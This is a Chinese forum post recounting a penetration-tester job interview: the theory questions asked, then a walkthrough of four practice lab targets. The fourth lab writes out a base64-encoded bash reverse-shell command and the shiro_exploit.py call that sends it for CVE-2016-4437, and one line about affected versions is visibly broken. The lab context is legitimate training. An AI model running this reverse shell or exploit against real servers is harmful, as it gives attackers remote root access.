深圳市某安有限公司

1198950962   ·   发表于 2022-05-16 21:11:08   ·   面试经验分享

面试公司:深圳市某安有限公司

薪资: 失败了,不太清楚
所在城市:深圳
面试岗位:渗透工程师
面试过程:因为太菜,所以找念旧内推了一下。
5月5号去的,因为是线下面试,主要是理论+实操。

面试问题:

请自我介绍一下
xxxxxxxxxxx

你挖过什么漏洞?
sql注入,文件上传,rce远程执行,弱口令,xss等

你怎么挖src的漏洞?
谷歌,fofa语法,或者挖通杀漏洞刷分。

会什么编程语言?
python,php基础

说一下你挖到过印象最深刻的漏洞?
我把风哥讲的远程代码执行怎么怎么操作的说了一遍,因为我没挖到过什么牛逼的洞。。

你了解tomcat漏洞吗,说一下?
Tomcat PUT方法任意写文件漏洞
tomcat 远程代码执行

你了解shiro漏洞吗,说一下?
不太了解

你了解反序列化吗?
序列化就是将对象的状态信息转为字符串,反序列化就是通过可控制unserialize将字符串转化信息拿出来用。(其实我也不太会)

你想往哪个方向发展?比如专注免杀,代码审计,app.....
web渗透

也没问太多,就到实操了

第一个靶场

题目:有5个flag,找出尽可能多的flag。
页面:一个登录页面,没有账号密码。
第一个在robots.txt里面


第二个在admin_area里面,抓包可以看见,以及登入密码


第三个在登入后,文件上传连接蚁剑里面找到


第四个也是在蚁剑里面翻到的


第五个我没找到,念旧说在linux里面,因为开放了22端口,但是我不晓得密码,连不上

第二个靶场

题目:挖掘尽可能多的漏洞
页面:新闻论坛之类的
挖掘思路:学过的漏洞,照着挖就可以了,没什么难度
一共6个:
1.搜索框,反射型XSS
2.发现是Apache,抓包 使用Burp的Spider模块,目录遍历漏洞
3.URL输入/admin,就可以到后台登录页面,弱口令
4.后台修改内容处,存储型XSS(可打到前台)
5.后台文章图片处,文件上传Getshell
6.xray扫到了一个Thinkphp框架的rce(CVE-2019-9082)

第三个靶场

题目:挖掘尽可能多的漏洞
页面:一个登录页面,有注册
挖掘思路:先注册一个账号,先登录
1.登录后可以修改个人信息,存储型XSS
2.Xray扫描,扫出一个代码执行,可以写shell,代码执行(双引号二次解析${})
3.弱口令
4.任意注册

第四个靶场(这个漏洞我当时没做出来,但是后面复现了一下,就ok了)

题目:目标:Getshell
页面:一个登录页面
挖掘思路:指纹识别,我用vulmap扫出了Shiro框架(CVE-2016-4437)
漏洞版本
Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)
影响版本:Apache Shiro & /dev/tcp/192.168.43.171/1234 0>&1

这段是base64加密
```cpp
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjE3MS8xMjM0IDA+JjE=

执行反弹shell

python3 shiro_exploit.py -t 3 -u http://192.168.43.78:8080/ -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjE3MS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}"

接收反弹shell


这里已经是root权限了,ok了

面试结果

失败

用户名金币积分时间理由
Track-劲夫 30.00 0 2022-05-16 21:09:37 一个受益终生的帖子~~

打赏我,让我更有动力~

6 条回复   |  直到 2023-10-14 | 1555 次浏览

1198950962
发表于 2022-5-16

如果有深圳的小伙伴可以去面试一下,我觉得我当时最后一题没做才被pass的

评论列表

  • 加载数据中...

编写评论内容

hhades
发表于 2022-5-17

现在面试都要做题了?这么凶残?

评论列表

  • 加载数据中...

编写评论内容

肖孟吉
发表于 2022-7-12

这都被pass了嘛,离谱

评论列表

  • 加载数据中...

编写评论内容

三十三
发表于 2022-5-19

强啊

评论列表

  • 加载数据中...

编写评论内容

18270072381
发表于 2022-8-12

这都被pass了嘛,离谱

评论列表

  • 加载数据中...

编写评论内容

track苏牧
发表于 2023-10-14

这都凉啦?离谱

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.